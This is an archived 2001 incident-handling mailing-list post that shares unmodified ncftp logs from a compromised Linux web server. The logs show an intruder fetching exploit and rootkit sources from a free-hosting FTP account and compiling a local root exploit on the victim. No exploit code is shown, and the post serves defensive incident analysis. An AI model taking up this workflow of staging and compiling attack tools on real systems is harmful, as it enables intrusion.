For all those interested in some logs,
This cracker has compromised another website -
http://www.ac.ac.th/default.htm
Logs of commands issued by cracker using ncftp: -
LOG - unmodified
topcities.com at Sun Sep 23 18:00:36 2001
get PASSWORDat_private/su.c">ftp://accessftp:PASSWORDat_private/su.c
topcities.com at Sun Sep 23 18:44:41 2001
topcities.com at Sun Sep 23 18:50:06 2001
get PASSWORDat_private/bsd.c">ftp://accessftp:PASSWORDat_private/bsd.c
get PASSWORDat_private/redhat.c">ftp://accessftp:PASSWORDat_private/redhat.c
get PASSWORDat_private/lpd.c">ftp://accessftp:PASSWORDat_private/lpd.c
get PASSWORDat_private/bsd-x.c">ftp://accessftp:PASSWORDat_private/bsd-x.c
get PASSWORDat_private/aix.c">ftp://accessftp:PASSWORDat_private/aix.c
get PASSWORDat_private/apache.c">ftp://accessftp:PASSWORDat_private/apache.c
get PASSWORDat_private/imapd.c">ftp://accessftp:PASSWORDat_private/imapd.c
get PASSWORDat_private/remove.c">ftp://accessftp:PASSWORDat_private/remove.c
get PASSWORDat_private/rip.c">ftp://accessftp:PASSWORDat_private/rip.c
topcities.com at Sun Sep 23 19:59:46 2001
get PASSWORDat_private/wuftpd-god.c">ftp://accessftp:PASSWORDat_private/wuftpd-god.c
topcities.com at Mon Sep 24 09:51:01 2001
topcities.com at Mon Sep 24 14:07:33 2001
topcities.com at Mon Sep 24 19:37:30 2001
get PASSWORDat_private/zone-pre">ftp://accessftp:PASSWORDat_private/zone-pre
get PASSWORDat_private/SEClpd.c">ftp://accessftp:PASSWORDat_private/SEClpd.c
get PASSWORDat_private/t666.c">ftp://accessftp:PASSWORDat_private/t666.c
HISTORY - unmodified
get su.c
quit
ls
get su.c
quit
ls
quit
ls
get su.c
gcc -o su su.c
quit
ls
get bsd.c
get redhat.c
get lpd.c
get bsd-x..c
get bsd-x.c
getaix.c
get aix.c
get apache.c
get imapd.c
get remove.c
get rip.c
get rpc.autofsd.c
get wu-scan.c
quit
get wu.c
ls
get wuftpd-god.c
quit
ls
exit
ls
get zone-pre
get SEClpd
get SEClpd.c
get t666.c
get rpc.c
quit
[root@www .ncftp]# vi trace
-- modified to protect someone
SESSION STARTED at: Mon Sep 24 19:37:15 2001
Program Version: NcFTP 3.0.0/354 October 04 1999, 04:17 AM
Library Version: LibNcFTP 3.0b3 (October 2, 1999)
Process ID: 13472
Platform: linux-x86
Uname: Linux|www.COMPROMISED.com.sg|2.2.14-5.0smp|#1 SMP
Tue Mar 7 21:01:40 EST 2000|i686^M
Hostname: www.COMPROMISED.com.sg (rc=2)
19:37:15 Fw: firewall.COMPROMISED.com.sg Type: 0 User: jogja Pass:
******** Port: 21
19:37:15 FwExceptions: .COMPROMISED.com.sg,localhost,localdomain
19:37:15 Resolving topcities.com...
19:37:16 Connecting to 64.152.192.119...
19:37:17 Remote server is running NcFTPd.
19:37:17 Logging in...
19:37:17 220: topcities.com NcFTPd Server (licensed copy) ready.
19:37:17 Connected to 64.152.192.119.
19:37:17 Cmd: USER accessftp
19:37:28 331: User accessftp okay, need password.
19:37:28 Cmd: PASS xxxxxxxx
19:37:29 Logging in...
19:37:29 230:
#######################################################################
19:37:29
#######################################################################
19:37:29
19:37:29 Welcome, accessftp. You are now logged into your account.
19:37:29
19:37:29 Your web site address: http://accessftp.topcities.com
19:37:29 You are connected from IP Address: [COMPROMISED HOST IP]
19:37:29 Space limit for your account: 153600000 bytes
19:37:29 Space used: 5377648 bytes
19:37:29 Maximum per-file size: 900 Kb
19:37:29 Upload bandwidth limit: 5 kB/sec
19:37:29 Download bandwidth limit: 2 kB/sec
19:37:29 PT: 0.20
19:37:29
19:37:29 Note: Please do not exceed your account quota by
uploading files
19:37:29 larger than 900Kb or exceeding your space limit. If you
do, subsequent
19:37:29 uploads will be unsucessful without notice to you.
19:37:29
19:37:29
#######################################################################
19:37:29
#######################################################################
19:37:29
19:37:29
19:37:29
19:37:29 Restricted user logged in.
19:37:29 Cmd: PWD
19:37:29 257: "/" is cwd.
19:37:29 Logged in to 64.152.192.119 as accessftp.
19:37:29 Cmd: FEAT
19:37:30 211: Extensions supported:
19:37:30 CLNT
19:37:30 MDTM
19:37:30 MLST
type*;size*;modify*;UNIX.mode*;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid;unique
19:37:30 PASV
19:37:30 REST STREAM
19:37:30 SIZE
19:37:30 TVFS
19:37:30 Compliance Level: 19981201 (IETF mlst-05)
19:37:30 End.
19:37:30 Cmd: HELP SITE
19:37:30 214: The following SITE commands are recognized:
19:37:30
19:37:30 Logged in to topcities.com.
19:37:30 Cmd: CLNT NcFTP 3.0.0 linux-x86
19:37:31 200: Noted.
19:37:42 > ls
19:37:42 Cmd: OPTS MLST
type;size;modify;UNIX.mode;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid
19:37:42 200: Options accepted:
type;size;modify;UNIX.mode;UNIX.uid;UNIX.gid
19:37:42 Cmd: PASV
19:37:42 227: Entering Passive Mode (64,152,192,119,11,87)
19:37:43 Cmd: MLSD
19:37:43 150: Data connection accepted from [COMPROMISED HOST IP]:3758;
transfer starting.
19:37:44 226: Listing completed.
19:37:44 Remote listing contents {
19:37:44
type=cdir;modify=20010923154433;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 /
19:37:44
type=file;size=229995;modify=20010918134314;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
GaP.tcl
19:37:44
type=dir;modify=20010922190607;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 IIS
19:37:44
type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
SEClpd.c
19:37:44
type=file;size=44356;modify=20010915112702;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
VBTERM.ZIP
19:37:44
type=dir;modify=20010818023652;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 _data
19:37:44
type=file;size=3543;modify=20010923093715;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
aix.c
19:37:44
type=file;size=55871;modify=20010911095825;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
allchan.tcl
19:37:44
type=file;size=6242;modify=20010915094640;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
amountdexp.zip
19:37:44
type=file;size=3066;modify=20010923094606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
apache.c
19:37:44
type=file;size=5241;modify=20010911102601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
ascii.tcl
19:37:44
type=file;size=24973;modify=20010919175706;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
bsd-x.c
19:37:44
type=file;size=25979;modify=20010913114244;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
bsd.c
19:37:44
type=file;size=53057;modify=20010911102624;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
fonts.txt
19:37:44
type=dir;modify=20010917133407;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 ftp
19:37:44
type=file;size=3626;modify=20010911090829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
host.tcl
19:37:44
type=file;size=3332;modify=20010915102000;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
imapd.c
19:37:44
type=file;size=2886;modify=20010919011110;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
index.htm
19:37:44
type=file;size=1784;modify=20010922040601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
loadnc.asp
19:37:44
type=file;size=2516;modify=20010911121619;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
lpd.c
19:37:44
type=file;size=3726;modify=20010918075807;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
named.htm
19:37:44
type=file;size=75482;modify=20010919130336;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
nc110.tgz
19:37:44
type=file;size=2003;modify=20010911095755;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
ns.tcl
19:37:44
type=file;size=7127;modify=20010917160516;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
oftpd.tar.gz
19:37:44
type=file;size=689;modify=20010915095601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
p3-sunos.tar.gz
19:37:44
type=file;size=29;modify=20010911180121;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
ps.txt
19:37:44
type=file;size=87;modify=20010911103054;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
psy.txt
19:37:44
type=file;size=197126;modify=20010905125107;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
psyBNC2.2.tar.gz
19:37:44
type=file;size=5181;modify=20010923104845;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
redhat.c
19:37:44
type=file;size=5101;modify=20010923164829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
remove.c
19:37:44
type=file;size=5553;modify=20010911123908;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rip.c
19:37:44
type=file;size=2721;modify=20010923130108;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rkit.tar.gz
19:37:44
type=file;size=3341;modify=20010912062001;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rpc.autofsd.c
19:37:44
type=file;size=2837;modify=20010923151532;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rpc.c
19:37:44
type=file;size=2924;modify=20010912055334;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rpcBSD.tar.gz
19:37:44
type=file;size=19119;modify=20010911125301;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
statdx.c
19:37:44
type=file;size=11990;modify=20010911121600;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
su.c
19:37:44
type=file;size=7394;modify=20010922100655;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
sunbrute.c
19:37:44
type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
t666.c
19:37:44
type=file;size=242007;modify=20010921110904;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
tel.zip
19:37:44
type=file;size=2502;modify=20010919184357;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
unicode.txt
19:37:44
type=file;size=145408;modify=20010921111014;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
unzip.exe
19:37:44
type=file;size=492;modify=20010922040606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
upload.asp
19:37:44
type=file;size=5867;modify=20010922040613;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
upload.inc
19:37:44
type=file;size=2095;modify=20010918063433;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
wu-scan.c
19:37:44
type=file;size=20964;modify=20010918085052;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
wuftpd-god.c
19:37:44
type=file;size=19343;modify=20010913115048;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
wuftpd.c
19:37:44
type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
zone-pre
19:37:44 }
19:37:44 aix.c IIS/ psy.txt t666.c
19:37:44 allchan.tcl imapd.c redhat.c tel.zip
19:37:44 amountdexp.zip index.htm remove.c
unicode.txt
19:37:44 apache.c loadnc.asp rip.c unzip.exe
19:37:44 ascii.tcl lpd.c rkit.tar.gz
upload.asp
19:37:44 bsd.c named.htm rpc.autofsd.c
upload.inc
19:37:44 bsd-x.c nc110.tgz rpcBSD.tar.gz
VBTERM.ZIP
19:37:44 _data/ ns.tcl rpc.c wuftpd.c
19:37:44 fonts.txt oftpd.tar.gz SEClpd.c
wuftpd-god.c
19:37:44 ftp/ p3-sunos.tar.gz statdx.c wu-scan.c
19:37:44 GaP.tcl ps.txt su.c zone-pre
19:37:44 host.tcl psyBNC2.2.tar.gz sunbrute.c
19:38:01 > get zone-pre
19:38:01 Cmd: TYPE I
19:38:01 200: Type okay.
19:38:01 Cmd: MLST zone-pre
19:38:02 250: Begin
19:38:02
type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
/zone-pre
19:38:02 End.
19:38:02 Cmd: PASV
19:38:02 227: Entering Passive Mode (64,152,192,119,11,88)
19:38:02 Cmd: RETR zone-pre
19:38:03 150: Data connection accepted from [COMPROMISED HOST IP]:3759;
transfer starting for zone-pre (10244 bytes).
19:38:05 226: Transfer completed.
19:38:29 > get SEClpd
19:38:29 Cmd: MLST SEClpd
19:38:30 550: No such file or directory.
19:38:30 Cmd: SIZE SEClpd
19:38:30 550: No such file.
19:38:30 Cmd: PASV
19:38:30 227: Entering Passive Mode (64,152,192,119,11,90)
19:38:31 Cmd: RETR SEClpd
19:38:31 550: No such file.
19:38:39 > get SEClpd.c
19:38:39 Cmd: MLST SEClpd.c
19:38:39 250: Begin
19:38:39
type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
/SEClpd.c
19:38:39 End.
19:38:39 Cmd: PASV
19:38:42 227: Entering Passive Mode (64,152,192,119,11,91)
19:38:42 Cmd: RETR SEClpd.c
19:38:42 150: Data connection accepted from [COMPROMISED HOST IP]:3761;
transfer starting for SEClpd.c (9911 bytes).
19:38:44 226: Transfer completed.
19:39:36 > get t666.c
19:39:36 Cmd: MLST t666.c
19:39:37 250: Begin
19:39:37
type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
/t666.c
19:39:37 End.
19:39:37 Cmd: PASV
19:39:37 227: Entering Passive Mode (64,152,192,119,11,93)
19:39:38 Cmd: RETR t666.c
19:39:38 150: Data connection accepted from [COMPROMISED HOST IP]:3762;
transfer starting for t666.c (19809 bytes).
19:39:41 226: Transfer completed.
19:58:54 > get rpc.c
19:58:54 Cmd: MLST rpc.c
19:58:54 Remote host has closed the connection.
19:58:54 421: Disconnecting you since you were inactive for 180 seconds.
19:58:54 Passive mode refused.
19:59:11 > quit
SESSION ENDED at: Mon Sep 24 19:59:11 2001
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 26 2001 - 08:25:37 PDT